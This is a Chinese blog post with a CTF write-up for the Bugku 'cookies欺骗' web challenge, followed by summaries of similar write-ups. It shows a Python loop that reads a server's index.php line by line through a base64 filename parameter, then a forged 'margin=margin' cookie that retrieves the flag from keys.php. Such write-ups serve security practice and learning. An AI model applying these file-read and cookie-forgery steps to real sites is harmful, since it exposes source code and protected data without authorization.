Bugku cookies欺骗

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量163 收藏
点赞数
分类专栏: Bugku-WriteUp CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kaixinXQ/article/details/119515549
版权

Bugku cookies欺骗


1.点开链接显示字符串

2.filename=a2V5cy50eHQ=  base64解码为keys.txt,将index.php通过base64编码,查看源码
url为:http://114.67.246.176:19276/index.php?line=1&filename=aW5kZXgucGhw
通过python脚本读取全部内容:
import requests

for i in range(30):
    url = "http://114.67.246.176:19276/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
    s = requests.get(url)
    print (s.text)

得到内容,可知flag在keys.php中,且需满足$_COOKIE['margin']=='margin'

将urlfilename替换为keys.php的base64编码,且设置Cookies:Cookie: margin=margin;
得到答案:

打嗝儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugku cookies
hintll的博客
06-17 1613
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性的看一下源码: 源码里也是什么都没有 f12看一下网络: 无意间看到了一个特殊的参数: http://114.67.246.176:12368/index.php?line=&filename=a2V5cy50eHQ= 后来仔细看,才发现这是URL a2V5cy50eHQ=像是一个base64的
Bugku-cookie
qq_51979295的博客
09-09 344
时间:2023年9月9日 类型:Web cookie base64发现get传参给变量filename了一个base64加密数据,解码后为key.txt,将字符串“index.php”base64编码后传给filename变量,再改变line的值来遍历主页源码,编写简易脚本跑一下 得到源码 代码分析 页面读取是先用了base64 decode再访问的,同时还会检查该页面在不在访问列表中。所以我们要将要访问的页面进行base64编码之后再传参,同时要注意访问文件是否在访问列表中 当获取到cookie ma
bugku-cookies
m0_62094846的博客
10-27 1001
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全Cookies...
cookie 修改欺骗必备工具
12-29
在网络安全领域,Cookie修改欺骗是一种常见的技术,常用于测试网站的安全性、理解用户跟踪机制以及进行恶意攻击。本文将深入探讨Cookie的相关知识,包括其原理、作用,以及如何使用修改工具进行欺骗操作。 Cookie是...
JavaScript的Cookies
10-30
# JavaScript的Cookies详解 ## 一、什么是CookiesCookies是一种小型的数据文件,通常由网站服务器创建并存储在用户的计算机硬盘上。这些数据文件用于记录用户的特定信息,以便于网站能够识别用户并根据用户的...
cookie欺骗bugku)
weixin_46396711的博客
04-28 1229
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
cookie欺骗bugku
hhh
09-06 2432
利用cookie值进行攻击; 完全没有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有没有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&fillename=key.txt; 另外url里还有一个参数:line...
BUGKU-WEB cookies
最新发布
天泽岁月
03-12 1190
BUGKU-WEB cookie欺骗
cookies-Bugku CTF
Alasding的博客
09-10 294
一看题目cookies,首先想到的就是抓包 抓包一看,emmm……毫无头绪哪 不过看url: /index.php?line=&filename=a2V5cy50eHQ= ”line=“空肯定是要设置一下什么参数 filename的值一看就是base64加密的密文呀 先解出来看看:keys.txt 但是keys.txt返回值什么都看不出来…… 想了半天……看见那个filename可以换一下参数看看别的文件还能不能看呀,最简单的最常用的就是index.php base64加密:aW5kZXgucGh
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 645
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 300
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
web——cookies欺骗(100)——Bugku
Zichel77的博客
08-09 302
0×00 靶场链接 http://123.206.87.240:8002/web11/ 0×01 题目描述 0×02 解题过程 cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录 点开链接是一段看不出什么的字符 URL:123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 然后发现filename是一个base64编码,解码一下 .
cookie欺骗
qq_44598397的博客
09-25 331
1bugku.cookie欺骗 解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt 因此推出结论 这里的源码应该是有一个include(fiename)或者filegetcontent(fiename)或者file_get_content(fiename)或者fileg​etc​ont...
Bugku-WEB-cookies欺骗(缺一个python脚本)
Jaychouzzk
11-24 398
题目: 这里注意到filename=a2V5cy50eHQ=,应该是base64编码,解码一下,得到了keys.txt 想想应该怎么利用一下呢。题目是cookies欺骗,可能keys.txt中应该存在我们所需要的cookies   解题:这里想错了。。没仔细去看url,明显是打开的keys.txt才输出的这么多字符串,line应该是对应的行数 尝试打开index.php看看是否能将其...
Bugku——cookie欺骗
csu_vc的博客
10-28 8365
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
HTTP Cookies:工作原理与详解
"HTTP cookies 详解" HTTP cookies,或者简称为“cookie”,是Web开发中用于维护用户会话状态的关键技术。它们的历史可以追溯到1994年,由网景通讯公司的Lou Montulli提出,旨在解决Web应用程序如何识别和跟踪用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值